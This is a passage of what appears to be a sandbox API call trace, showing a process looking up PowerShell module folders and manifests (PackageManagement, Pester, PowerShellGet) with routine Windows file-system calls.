hFindFile=0x784d540 | out: hFindFile=0x784d540) returned 1 [0218.772] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea14) returned 1 [0218.772] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea20) returned 1 [0218.772] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x90 [0218.772] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", nBufferLength=0x90, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", lpFilePart=0x0) returned 0x8f [0218.772] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9ec) returned 1 [0218.772] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\1.0.1\\microsoft.powershell.operation.validation.psd1"), fInfoLevelId=0x0, lpFileInformation=0x933ea68 | out: lpFileInformation=0x933ea68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97de4ff6, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x97de4ff6, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x97de4ff6, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x614)) returned 1 [0218.774] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e8) returned 1 [0218.775] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x90 [0218.775] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", nBufferLength=0x90, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", lpFilePart=0x0) returned 0x8f [0218.775] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x90 [0218.775] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", nBufferLength=0x90, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", lpFilePart=0x0) returned 0x8f [0218.775] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea10) returned 1 [0218.775] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\1.0.1\\microsoft.powershell.operation.validation.psd1"), fInfoLevelId=0x0, lpFileInformation=0x57dd7bc | out: lpFileInformation=0x57dd7bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97de4ff6, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x97de4ff6, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x97de4ff6, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x614)) returned 1 [0218.775] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea0c) returned 1 [0218.775] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\Microsoft.PowerShell.Operation.Validation.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\microsoft.powershell.operation.validation.psd1")) returned 0xffffffff [0218.775] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\Microsoft.PowerShell.Operation.Validation.psm1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\microsoft.powershell.operation.validation.psm1")) returned 0xffffffff [0218.775] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\Microsoft.PowerShell.Operation.Validation.cdxml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\microsoft.powershell.operation.validation.cdxml")) returned 0xffffffff [0218.775] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\Microsoft.PowerShell.Operation.Validation.xaml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\microsoft.powershell.operation.validation.xaml")) returned 0xffffffff [0218.775] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\Microsoft.PowerShell.Operation.Validation.ni.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\microsoft.powershell.operation.validation.ni.dll")) returned 0xffffffff [0218.776] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\Microsoft.PowerShell.Operation.Validation.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\microsoft.powershell.operation.validation.dll")) returned 0xffffffff [0218.776] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea58) returned 1 [0218.776] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x43 [0218.776] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x43, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x42 [0218.776] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\*", lpFindFileData=0x933e780 | out: lpFindFileData=0x933e780*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbc717ae6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c6f037, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x784d540 [0218.776] FindNextFileW (in: hFindFile=0x784d540, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbc717ae6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c6f037, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0218.776] FindNextFileW (in: hFindFile=0x784d540, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbc718a55, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b27bb25, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0218.776] FindNextFileW (in: hFindFile=0x784d540, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0218.776] FindClose (in: hFindFile=0x784d540 | out: hFindFile=0x784d540) returned 1 [0218.777] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea14) returned 1 [0218.777] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea20) returned 1 [0218.777] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x62 [0218.777] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x62, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x61 [0218.777] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9ec) returned 1 [0218.777] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x933ea68 | out: lpFileInformation=0x933ea68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a7a67f5, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5e5ed2e, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5e5ed2e, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x8fa)) returned 1 [0218.779] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e8) returned 1 [0218.779] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x62 [0218.779] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x62, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x61 [0218.779] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x62 [0218.779] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x62, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x61 [0218.779] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea10) returned 1 [0218.779] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x57dfc00 | out: lpFileInformation=0x57dfc00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a7a67f5, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5e5ed2e, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5e5ed2e, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x8fa)) returned 1 [0218.779] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea0c) returned 1 [0218.779] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psd1")) returned 0xffffffff [0218.779] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psm1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psm1")) returned 0xffffffff [0218.779] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.cdxml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\packagemanagement.cdxml")) returned 0xffffffff [0218.779] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.xaml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\packagemanagement.xaml")) returned 0xffffffff [0218.779] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.ni.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\packagemanagement.ni.dll")) returned 0xffffffff [0218.780] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\packagemanagement.dll")) returned 0xffffffff [0218.780] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea58) returned 1 [0218.780] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x38 [0218.780] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x38, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x37 [0218.780] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\*", lpFindFileData=0x933e780 | out: lpFindFileData=0x933e780*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x4698376a, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x4698376a, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x784d540 [0218.780] FindNextFileW (in: hFindFile=0x784d540, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x4698376a, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x4698376a, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0218.780] FindNextFileW (in: hFindFile=0x784d540, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbc7fefb9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x34a924f, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0218.780] FindNextFileW (in: hFindFile=0x784d540, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbc8ab4af, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a7cca5f, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.4.0", cAlternateFileName="34AE2D~1.0")) returned 1 [0218.781] FindNextFileW (in: hFindFile=0x784d540, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0218.781] FindClose (in: hFindFile=0x784d540 | out: hFindFile=0x784d540) returned 1 [0218.781] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea14) returned 1 [0218.781] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea20) returned 1 [0218.781] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0218.781] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", nBufferLength=0x4a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", lpFilePart=0x0) returned 0x49 [0218.781] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9ec) returned 1 [0218.781] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\pester\\3.4.0\\pester.psd1"), fInfoLevelId=0x0, lpFileInformation=0x933ea68 | out: lpFileInformation=0x933ea68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9876e9c4, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x9876e9c4, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x9876e9c4, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1014)) returned 1 [0218.787] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e8) returned 1 [0218.787] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0218.787] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", nBufferLength=0x4a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", lpFilePart=0x0) returned 0x49 [0218.787] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0218.787] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", nBufferLength=0x4a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", lpFilePart=0x0) returned 0x49 [0218.787] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea10) returned 1 [0218.787] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\pester\\3.4.0\\pester.psd1"), fInfoLevelId=0x0, lpFileInformation=0x57e1898 | out: lpFileInformation=0x57e1898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9876e9c4, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x9876e9c4, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x9876e9c4, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1014)) returned 1 [0218.787] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea0c) returned 1 [0218.787] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0218.787] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x4a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x49 [0218.787] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9ec) returned 1 [0218.787] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), fInfoLevelId=0x0, lpFileInformation=0x933ea68 | out: lpFileInformation=0x933ea68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x511551ea, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x511551ea, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x511551ea, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5)) returned 1 [0218.791] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e8) returned 1 [0218.791] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0218.792] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x4a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x49 [0218.792] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0218.792] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x4a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x49 [0218.792] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea10) returned 1 [0218.792] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), fInfoLevelId=0x0, lpFileInformation=0x57e1ad8 | out: lpFileInformation=0x57e1ad8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x511551ea, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x511551ea, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x511551ea, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5)) returned 1 [0218.792] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea0c) returned 1 [0218.792] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\Pester.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\pester\\pester.psd1")) returned 0xffffffff [0218.792] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\Pester.psm1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\pester\\pester.psm1")) returned 0xffffffff [0218.792] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\Pester.cdxml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\pester\\pester.cdxml")) returned 0xffffffff [0218.793] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\Pester.xaml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\pester\\pester.xaml")) returned 0xffffffff [0218.793] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\Pester.ni.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\pester\\pester.ni.dll")) returned 0xffffffff [0218.793] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\Pester.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\pester\\pester.dll")) returned 0xffffffff [0218.793] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea58) returned 1 [0218.793] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3f [0218.793] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x3f, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x3e [0218.793] FindFirstFileW (in: 